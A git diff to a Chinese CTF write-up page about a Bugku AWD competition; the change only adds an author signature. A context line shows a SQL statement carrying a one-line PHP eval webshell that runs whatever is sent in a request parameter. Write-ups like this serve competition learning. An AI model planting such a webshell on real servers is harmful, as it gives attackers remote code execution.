--- a/web/bugku-awd小记-10.7/index.html
+++ b/web/bugku-awd小记-10.7/index.html
@@ -1398,6 +1398,9 @@ select &#39;&lt;?phpeval($_REQUEST[yunsee])?&gt;&#39;;
 <p>直接读取即可。</p>
 <p><img alt="image-20251007193319745" src="https://cdn.jsdelivr.net/gh/CTF-USTB/Panic404-wp-images/images/20251007200834352.png" /></p>
 <p>fix的内容没发出来，就不写（抄）了</p>
+<p style="text-align: right;">
+by. Huaji
+</p>
 
 
 
